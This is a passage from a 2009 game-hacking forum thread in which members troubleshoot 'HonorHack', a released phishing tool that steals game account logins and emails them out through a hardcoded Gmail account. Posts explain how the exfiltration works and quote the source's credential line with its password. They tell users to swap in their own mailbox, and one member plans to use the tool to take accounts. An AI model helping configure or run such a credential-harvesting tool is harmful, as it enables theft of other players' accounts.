[RELEASE] HonorHack V1.1 {PHISHER} menu
100% Up to 1000$
4.9/5
150% Up to 200$ & 20 Freespins
4.8/5
Up to 1 BTC
4.9/5
20% Cashback
4.8/5
Up to 5 BTC
4.8/5
100% Up to 1 BTC
4.7/5
Up to 5 BTC
4.7/5
110% Up to 1 BTC
4.6/5

User Tag List

Page 6 of 6 FirstFirst ... 23456
Results 76 to 86 of 86
  1. #76
    Fajitaz's Avatar Member
    Reputation
    1
    Join Date
    Jun 2009
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    [RELEASE] HonorHack V1.1 {PHISHER}
    Ey m8!

    I got that error message everyone is talking about you know and i dont recieve any mail. Do you think you can help me quick? Im a swedish guy too. So if you got some time. add my maiil Fajitaz91 @ hotmail. com

    Take care!
    Last edited by Fajitaz; 07-22-2009 at 08:14 PM.

    [RELEASE] HonorHack V1.1 {PHISHER}
  2. #77
    Me0w's Avatar Contributor
    Reputation
    170
    Join Date
    Jan 2008
    Posts
    469
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Fajitaz View Post
    Ey m8!

    I got that error message everyone is talking about you know and i dont recieve any mail. Do you think you can help me quick? Im a swedish guy too. So if you got some time. add my maiil Fajitaz91 @ hotmail. com

    Take care!
    The error is for everyone, the problem is this:

    He has a Gmail account that sends the phishing info to you. Problem is, that mail account's info is easily obtainable from the program, so someone has taken it and changed the password for whatever reason. Thus, the program cannot log in to send any mails. OP doesn't seem to bother to recover the password so until he does, this program will not work for anyone (unless you change the mail in the code to one you've done yourself, but I guess if you knew how to do that you wouldn't be here asking about a problem we already know about).


  3. #78
    Fajitaz's Avatar Member
    Reputation
    1
    Join Date
    Jun 2009
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ok i understand thank you! But in what file can i change the mail?
    I changed the info in "form1" config. But i still dont get any mail and i get that error once again "Unhandles exception has occured in your application. I you click continue, the application will ignore this error and attempt to continue. If you click quit, the application will close immediately.

    The SMTP server requiers a secure connection or the client was not authenticated. The server response was:5.5.1 Authentication required. Learn more at....
    Last edited by Fajitaz; 07-23-2009 at 03:43 AM.

  4. #79
    nith's Avatar Active Member
    Reputation
    18
    Join Date
    Dec 2008
    Posts
    42
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Svenskt hacking program! verkar trevligt

  5. #80
    sharpes123's Avatar Active Member

    Reputation
    16
    Join Date
    Sep 2008
    Posts
    213
    Thanks G/R
    1/1
    Trade Feedback
    4 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Looks great, thankyou.

  6. #81
    bloxstorm's Avatar Member
    Reputation
    1
    Join Date
    May 2008
    Posts
    16
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Form1, on my task bar. Would be cool to be fixed...or did I fail?

  7. #82
    DKDéáth's Avatar Banned
    Reputation
    85
    Join Date
    Dec 2008
    Posts
    181
    Thanks G/R
    0/0
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    client.Credentials = New NetworkCredential("[email protected]", "uromastyx")

    The pass isnt working for this email... how do i change to so it goes under my gmail?

  8. #83
    Henessy's Avatar Contributor
    Reputation
    104
    Join Date
    Sep 2008
    Posts
    1,284
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Change the Email and Pass to yours =)

  9. #84
    Skylark's Avatar Active Member
    Reputation
    73
    Join Date
    Aug 2009
    Posts
    73
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    very nice. I'll definately use it, and if I get any accounts from it, you will receive the second one I get.

  10. #85
    PixelFlame's Avatar Active Member
    Reputation
    33
    Join Date
    Nov 2008
    Posts
    113
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Okay, I'll be linking a guide on how to change the email in the Original post, just gotta find it... i believe it's from jetlag, or w/e he's called.

  11. #86
    Barrt73Rus's Avatar Banned
    Reputation
    171
    Join Date
    May 2009
    Posts
    1,272
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    not work.
    System.Net.Mail.SmtpException: Серверу SMTP требовалось защищенное соединение, или подлинность клиента не была установлена. Ответ сервера: 5.5.1 Authentication Required. Learn more at
    в System.Net.Mail.MailCommand.CheckResponse(SmtpStatusCode statusCode, String response)
    в System.Net.Mail.MailCommand.Send(SmtpConnection conn, Byte[] command, String from)
    в System.Net.Mail.SmtpTransport.SendMail(MailAddress sender, MailAddressCollection recipients, String deliveryNotify, SmtpFailedRecipientException& exception)
    в System.Net.Mail.SmtpClient.Send(MailMessage message)
    в WindowsApplication1.Form1.Button1_Click(Object sender, EventArgs e)
    в System.Windows.Forms.Control.OnClick(EventArgs e)
    в System.Windows.Forms.Button.OnClick(EventArgs e)
    в System.Windows.Forms.Button.OnMouseUp(MouseEventArgs mevent)
    в System.Windows.Forms.Control.WmMouseUp(Message& m, MouseButtons button, Int32 clicks)
    в System.Windows.Forms.Control.WndProc(Message& m)
    в System.Windows.Forms.ButtonBase.WndProc(Message& m)
    в System.Windows.Forms.Button.WndProc(Message& m)
    в System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
    в System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
    в System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
    net frame 3.5 installed, win xp sp3 ... this error after i push "start"
    and on my email nothing send

Page 6 of 6 FirstFirst ... 23456

Similar Threads

  1. [RELEASE] HonorHack V1.1 {PHISHER}
    By PixelFlame in forum World of Warcraft Bots and Programs
    Replies: 3
    Last Post: 06-15-2009, 04:02 PM
All times are GMT -5. The time now is 05:44 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search